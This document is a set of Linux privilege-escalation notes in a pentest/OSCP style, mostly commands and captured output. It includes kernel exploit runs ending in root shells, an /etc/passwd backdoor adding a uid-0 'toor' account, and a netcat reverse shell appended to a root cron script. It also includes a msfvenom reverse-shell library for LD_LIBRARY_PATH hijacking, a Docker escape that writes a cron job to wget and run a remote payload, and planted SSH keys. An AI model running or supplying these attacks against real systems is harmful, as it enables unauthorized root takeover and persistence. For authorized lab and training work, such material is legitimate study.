
Linux Privilege Escalation

Upgrade Shell

PayloadsAllTheThings: Spawn TTY Shell

Spawning a TTY Shell

python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/usr/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/zsh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
/usr/bin/script -qc /bin/sh /dev/null
perl -e 'exec "/bin/sh";'
/bin/sh -i

(From within perl)

exec "/bin/sh";

(From within ruby)

exec "/bin/sh"

(From within python)

import os; os.system('/bin/bash')

(From within lua)

os.execute('/bin/sh')

(From within IRB)

exec "/bin/sh"

(From within vi)

:!bash
:set shell=/bin/bash
:shell

(From within nmap --interactive, old versions only)

!sh

Nice Terminal

Fully interactive shell: set TERM in the remote shell, background it with Ctrl-Z, put the local terminal in raw mode and bring the shell back, press Enter (run reset if the screen is garbled), then give the remote shell the size of the local terminal (values from stty size run locally).

export TERM=xterm
^Z
stty raw -echo; fg
stty rows 42 columns 172

User Enumeration

Current User

hostname && whoami && id

Which ones have a valid shell

grep -vE "nologin|false" /etc/passwd

Folder

pwd; ls -la

OS & Architecture & Kernel

Kernel version and Architecture

uname -a
cat /etc/issue; uname -r; arch

What's the OS?

cat /etc/*-release
lsb_release -a (Debian based OSs)

Drivers & Kernel Modules

lsmod
/sbin/modinfo <name>

Compile exploit in C/C++

Check the word size of the target before building: sizeof(size_t) is 4 on x86 and 8 on x86_64. Compile kernel exploits for the target's architecture (gcc -m32 needs the 32-bit multilib installed; where possible compile on the target itself so the glibc matches).

#include <stdio.h>
int main(void)
{
        printf("Size = %zu\n", sizeof(size_t));
        return 0;
}

$ gcc -m32 Size.c -o x86-S
$ ./x86-S
Size = 4
$ gcc Size.c -o x64-S
$ ./x64-S
Size = 8

<= 2.6.36-rc8 - 'RDS Protocol'

www-data@ip:/tmp$ uname -a
Linux ip 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux

https://fareedfauzi.gitbook.io/oscp-notes/linux-post-exploitation/linux-exploitation#exploits-worth-running

https://www.exploit-db.com/raw/15285

gcc -m32 15285.c -o 15285
www-data@ip:/tmp$ ./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root)

<= 2.6.37 'Full-Nelson'

www-data@popcorn:/home/george$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/issue
Ubuntu 9.10 \n \l

https://www.exploit-db.com/exploits/15704

www-data@popcorn:/var/www$ gcc 15704.c -o 15704
www-data@popcorn:/var/www$ chmod +x 15704
www-data@popcorn:/var/www$ ./15704
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf846a280
 [+] Resolved econet_ops to 0xf846a360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# whoami
root
#

2.6.39 <= kernel < 3.2.2 'Mempodipper' (x86/x64)

www-data@hades:/tmp$ uname -a
Linux hades 3.0.0-12-server #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

https://www.exploit-db.com/exploits/35161

www-data@hades:/tmp$ ./35161 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2338/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
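Added example (not from the original notes or from any of the exploits above): a small shell helper that normalises a uname -r string and checks it against the kernel ranges of the three exploits listed in this section, so the right one can be picked without eyeballing version strings. The release suffix (-12-server, -generic-pae, -rc8) is dropped before comparing, so the -rc8 bound is approximate, and distro kernels backport fixes, so a match is a reason to try the exploit, not proof that it works.

```bash
#!/bin/sh
# Added example: match "uname -r" against the kernel ranges of the exploits
# in these notes. Release suffixes (-12-server, -rc8, -generic-pae) are
# dropped before comparing; backported distro fixes are NOT accounted for.

# kver_num <release>: "3.0.0-12-server" -> 3000000 (major*10^6 + minor*10^3 + patch)
kver_num() {
    v=${1%%-*}                          # strip everything from the first '-'
    major=${v%%.*}
    rest=${v#*.}
    [ "$rest" = "$v" ] && rest=0        # no minor component
    minor=${rest%%.*}
    patch=${rest#*.}
    [ "$patch" = "$rest" ] && patch=0   # no patch component
    patch=${patch%%.*}                  # ignore a fourth component
    echo $(( major * 1000000 + minor * 1000 + patch ))
}

# kver_in_range <release> <min-inclusive|-> <max-exclusive|->
# "-" means no bound on that side.
kver_in_range() {
    k=$(kver_num "$1")
    [ "$2" = "-" ] || [ "$k" -ge "$(kver_num "$2")" ] || return 1
    [ "$3" = "-" ] || [ "$k" -lt "$(kver_num "$3")" ] || return 1
    return 0
}

# check_kernel <release>: print one line per exploit whose range matches
check_kernel() {
    r=$1
    kver_in_range "$r" 2.6.30 2.6.37 && echo "EDB-15285 RDS (2.6.30 <= kernel <= 2.6.36)"
    kver_in_range "$r" -      2.6.38 && echo "EDB-15704 Full-Nelson (kernel <= 2.6.37)"
    kver_in_range "$r" 2.6.39 3.2.2  && echo "EDB-35161 Mempodipper (2.6.39 <= kernel < 3.2.2)"
    return 0
}

# stand-alone use: check the running kernel
check_kernel "$(uname -r)"
```

Run it on the target (or feed it the uname -r output copied from the target). For the three boxes above it reports RDS and Full-Nelson for 2.6.32-21-generic, both again for 2.6.31-14-generic-pae, and only Mempodipper for 3.0.0-12-server.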

Processes and Services

ps axu

Listening ports

sudo lsof -i -P -n | grep LISTEN

List all enabled services from systemctl

systemctl list-unit-files | grep enabled

Active network connection

ss -anp
netstat -antup

Binaries That AutoElevate (SUID)

find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null

Look each unusual one up on https://gtfobins.github.io; the SUID bit only helps if the binary can be made to read, write or execute something on your behalf.

sudo

Check sudo access

$ sudo -l
[sudo] password for Hades: 
Matching Defaults entries for pentesterlab on 7358cafc3ebe:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hades may run the following commands:
    (victim) /bin/bash

(victim) is the RunAs user: Hades may start /bin/bash as victim with sudo -u victim, authenticating with Hades's own password.

Mix cp/chown and chmod

https://www.adampalmer.me/iodigitalsec/2009/10/03/linux-c-setuid-setgid-tutorial

https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries

sudo -l
Matching Defaults entries for Hades:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hades may run the following commands:
    (victim) /bin/chmod, /bin/cp

cp and chmod as victim are enough for a SUID shell: cp a shell binary as victim (the copy is owned by victim), chmod u+s the copy as victim, then run it (bash needs -p to keep the effective uid). Any file victim can read can be copied out the same way.

Readable/Writable

find / -writable -type d 2>/dev/null
find / -writable 2>/dev/null

File /etc/passwd

If /etc/passwd is writable by the current user, put a password hash straight into root's second field: when that field is anything other than "x", the hash in /etc/passwd is used and /etc/shadow is not consulted.

ls -l /etc/passwd
$ openssl passwd
Password:
Verifying - Password:
QzKsrWCYxmRPY

QzKsrWCYxmRPY is the crypt(3) hash of the password just typed. Plain openssl passwd produces traditional DES crypt, which only uses the first 8 characters of the password; -1 gives MD5 crypt and -6 SHA-512 crypt.

sed 's/root:x:/root:QzKsrWCYxmRPY:/' /etc/passwd > passwd
cat passwd > /etc/passwd
su

Generate password for new user

openssl passwd -1 -salt hades leecybersec

Credential: toor / leecybersec

echo 'toor:$1$hades$KKCtexC.plAyjcJkX7War0:0:0:root:/root:/bin/sh' >> /etc/passwd

https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation
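Added example (not from the original notes or the linked article): a shell helper that audits a passwd-format file for the conditions this section relies on: is the file writable, which accounts have uid 0 (a second one is the backdoor above), which accounts carry a real hash in the second field (so /etc/shadow is bypassed for them), and which have a usable shell. It takes the file as an argument so it can be run against a constructed sample as well as the live /etc/passwd; the sample below is constructed for the example and reuses the toor line from these notes.

```bash
#!/bin/sh
# Added example: audit a passwd-format file for the conditions these notes
# rely on. Takes the file path, so it also works on a copy or a sample.

# passwd_audit <file>: one finding per line
#   writable      the file is writable by the current user
#   uid0:<name>   account with uid 0 (more than one is a backdoor)
#   hash:<name>   2nd field holds a real hash, so /etc/shadow is bypassed
#   shell:<name>  account with a usable login shell
passwd_audit() {
    f=$1
    [ -w "$f" ] && echo writable
    while IFS=: read -r name pw uid gid gecos home shell; do
        case $name in ''|'#'*) continue ;; esac
        [ "$uid" = 0 ] && echo "uid0:$name"
        case $pw in x|'*'|'!'*|'') ;; *) echo "hash:$name" ;; esac
        case $shell in ''|*/nologin|*/false) ;; *) echo "shell:$name" ;; esac
    done < "$f"
    return 0
}

# passwd_line <user> <crypt-hash>: the uid-0 entry appended in the notes above
passwd_line() {
    printf '%s:%s:0:0:root:/root:/bin/sh\n' "$1" "$2"
}

# sample_passwd: constructed sample (NOT a real system's /etc/passwd)
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hades:x:1000:1000::/home/hades:/bin/bash
EOF
    passwd_line toor '$1$hades$KKCtexC.plAyjcJkX7War0'   # the backdoor from the notes
}

# stand-alone: audit the sample, then the live file if readable
tmp=$(mktemp) && sample_passwd > "$tmp" && passwd_audit "$tmp"; rm -f "$tmp"
if [ -r /etc/passwd ]; then passwd_audit /etc/passwd; fi
```

On the sample the audit flags root and toor as uid 0, toor as carrying a hash, and root, hades and toor as having shells; on a live box the same output is what a defender should be alarmed by and what an attacker wants to confirm before running su.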

Scheduled Tasks

ls -lah /etc/cron*
cat /etc/crontab
grep "CRON" /var/log/* 2>/dev/null

Cronjob file insecure

check.sh is run by root every minute and is world-writable, so anything appended to it runs as root on the next run.

ls -l check.sh
-rw-rw-rw- 1 root root <snip> check.sh

Append a reverse shell (appending rather than overwriting keeps the original job working, so nothing breaks visibly):

echo "rm /tmp/f; mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f" >> check.sh

PATH Search Order Crontab

$ cat /etc/crontab
<snip>
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/5 *   * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

==> PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

run-parts is called without a path, so cron searches this PATH in order. /usr/local/bin comes before the directory holding the real run-parts and is world-writable, so a file of that name dropped there is what root executes:

chloe@roquefort:~$ ls -ld /usr/local/bin
drwxrwsrwx 2 root staff 4096 Apr 24  2020 /usr/local/bin
cp /tmp/shell /usr/local/bin/run-parts

https://crontab.guru: */5 : "At every 5th minute." The fake run-parts runs as root within five minutes.

$ sudo nc -nvlp 22
listening on [any] 22 ...
connect to [ip] from (UNKNOWN) [ip] 37228
id
uid=0(root) gid=0(root) groups=0(root)

Module Import Hijacking

Dynamic Library Hijacking

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
<snip>
  *  *  *  *  * root       /usr/bin/log-sweeper

==> LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils

The job is a root-run binary that needs utils.so, and no directory in this LD_LIBRARY_PATH currently provides it, so the first directory in the list where a utils.so appears is the one the loader picks up. /usr/local/lib/dev is world-writable:

[hades@hades ~]$ ls -ld /usr/local/lib/dev
drwxrwxrwx 2 root root 6 Sep  7  2020 /usr/local/lib/dev
[hades@hades ~]$ ls -l /usr/bin/log-sweeper
-rwxr-xr-x. 1 root root 8800 Sep  4  2020 /usr/bin/log-sweeper
[hades@hades ~]$ /usr/bin/log-sweeper
/usr/bin/log-sweeper: error while loading shared libraries: utils.so: cannot open shared object file: No such file or directory

Exploit: build a shared object whose constructor runs the payload and drop it as utils.so in the writable directory. It only needs to be readable by root; chmod 777 is not required.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.158 LPORT=6379 -f elf-so > utils.so
[hades@hades dev]$ chmod 777 utils.so 
[hades@hades dev]$ pwd
/usr/local/lib/dev
$ sudo nc -nvlp 6379
listening on [any] 6379 ...
connect to [ip] from (UNKNOWN) [ip] 55124
id
uid=0(root) gid=0(root) groups=0(root)
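Added example (not from the original notes) covering both the PATH search-order case and the LD_LIBRARY_PATH case above: a shell helper that pulls a variable out of a crontab the way cron sees it and lists the entries of that colon-separated list the current user can write to, in search order. Given the name of the command or library the job loads, it stops at the first directory that already holds it, since directories after that one are never searched. The crontab below is constructed for the example, modelled on the two crontabs in these notes.

```bash
#!/bin/sh
# Added example: locate writable directories in the PATH / LD_LIBRARY_PATH
# that cron hands to root jobs, i.e. the two hijacks described above.

# cron_env_value <crontab> <VAR>: value of the first VAR= line, quotes stripped
cron_env_value() {
    sed -n "s/^[[:space:]]*$2=//p" "$1" \
        | sed -e 's/^"\(.*\)"$/\1/' -e "s/^'\(.*\)'\$/\1/" \
        | head -n 1
}

# writable_dirs_in <colon-list> [name]
# Print the entries the current user can write to, in search order.
# If <name> is given (the command or .so the job loads), stop at the first
# entry that already holds it: directories after it are never searched.
writable_dirs_in() {
    rest=$1; name=$2
    while [ -n "$rest" ]; do
        d=${rest%%:*}
        if [ "$d" = "$rest" ]; then rest=; else rest=${rest#*:}; fi
        [ -n "$d" ] || d=.                  # empty entry means cwd
        if [ -d "$d" ] && [ -w "$d" ]; then echo "$d"; fi
        if [ -n "$name" ] && [ -e "$d/$name" ]; then break; fi
    done
    return 0
}

# cron_hijack_report <crontab>: both variables, writable entries indented
cron_hijack_report() {
    for var in PATH LD_LIBRARY_PATH; do
        v=$(cron_env_value "$1" "$var")
        [ -n "$v" ] || continue
        echo "$var=$v"
        writable_dirs_in "$v" | sed 's/^/  writable: /'
    done
    return 0
}

# sample_crontab: constructed crontab modelled on the two cases in the notes
sample_crontab() {
    cat <<'EOF'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH="/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils"
*/5 * * * * root cd / && run-parts --report /etc/cron.hourly
 *  * * * * root /usr/bin/log-sweeper
EOF
}

# stand-alone: report on the live crontab when present
if [ -r /etc/crontab ]; then cron_hijack_report /etc/crontab; fi
```

For the PATH case pass the command name, writable_dirs_in "$(cron_env_value /etc/crontab PATH)" run-parts, and only directories searched before the real run-parts are printed; for the LD_LIBRARY_PATH case pass utils.so, and because it exists nowhere every writable entry is printed, the first of which is the one the loader will use.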

Python Module Hijacking

$ cat python.py 
#!/usr/bin/python

import sys

try:
    import controller
except Exception:
    print "[!] ERROR: Unable to load controller module."
    sys.exit()

controller is imported by name and does not exist anywhere on the system. Python searches sys.path in order, starting with the directory of the script itself, so if that directory (or any other sys.path entry) is writable, a controller.py dropped there is what gets imported when the script runs as root.

Create controller.py with malicious Python code in the script's directory:

echo 'import os;os.system("chmod 777 /etc/passwd")' > controller.py

Docker container

Check whether you are in a container

root@315d7648a173:/# ls -lah
<snip>
-rwxr-xr-x   1 root root    0 Jun  9 13:01 .dockerenv

Mount the host's disk inside the container (works when the container is privileged or otherwise has the block device; list candidates with lsblk and try the partitions one at a time, unmounting between attempts, until the host root filesystem shows up):

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola
mount /dev/sda2 /mnt/hola
mount /dev/sda3 /mnt/hola

Once the host filesystem is mounted

Add a cron job: https://github.com/MauroEldritch/GEVAUDAN/blob/master/gevaudan.rb

/sbin/mount.glusterfs ip:/gluster_shared_storage /tmp/x
echo '* * * * * root /bin/bash -c "/usr/bin/wget http://ip/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell"' > /tmp/x/snaps/gcron_enabled

Change root directory

mkdir /hdd && mount /dev/sda1 /hdd && chroot /hdd

Add ssh public key

ssh-keygen -t rsa
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAA ...key...' > /mnt/hola/root/.ssh/authorized_keys

Installed and Patch Levels

dpkg -l (Debian based OSs)
rpm -qa (CentOS / openSUSE )
uname -a

Networking Enumeration

Interfaces and routes

ip a
/sbin/route

Firewall and Rules

grep -Hs iptables /etc/*

Unmounted Disks

List all mounted file systems

mount
cat /etc/fstab

List all disks

/bin/lsblk

Mount an NFS share (-o nolock disables NFS file locking, so no lock daemon is needed on the client)

sudo mount -o nolock 192.168.11.131:/share ~/share

Enumeration Tools

Basic Linux Privilege Escalation

https://gtfobins.github.io

https://github.com/DominicBreuker/pspy

https://github.com/rebootuser/LinEnum

https://github.com/diego-treitos/linux-smart-enumeration

http://pentestmonkey.net/tools/audit/unix-privesc-check

More Commands

history, bashrc, backup (quote the globs so the shell does not expand them in the current directory)

find / -name '*history*' 2>/dev/null
find / -name '*backup*' 2>/dev/null
find / -name '*bashrc*' -exec grep -i passw {} \; 2>/dev/null

Port Tunneling

Local Tunneling

Port $myport on the attacking box is forwarded through the SSH connection to 127.0.0.1:5985 as seen from the target:

ssh -L $myport:127.0.0.1:5985 hades@192.168.11.133 -i id_rsa

Remote Tunneling

From the target, open $myport on the attacker's SSH server and forward it back to 127.0.0.1:5985 on the target (binding to $myip instead of loopback needs GatewayPorts yes in the attacker's sshd_config):

ssh -R $myip:$myport:127.0.0.1:5985 kali@$myip -i kali-idrsa

SSH ESCAPE CHARACTERS

~C opens the ssh command line on a live session (add -L/-R forwards without reconnecting); ~. closes a hung session. Both only work immediately after a newline.

Generate SSH Key

ssh-keygen -t rsa
cat id_rsa.pub >> ~/.ssh/authorized_keys

Append rather than cp, so existing keys stay; sshd ignores the file if ~/.ssh or authorized_keys is writable by others (StrictModes), so keep them 700 and 600.

Add user to sudo

Create user:pass

echo -e "pass\npass" | adduser --gecos "" user
usermod -aG sudo user
sudo su - user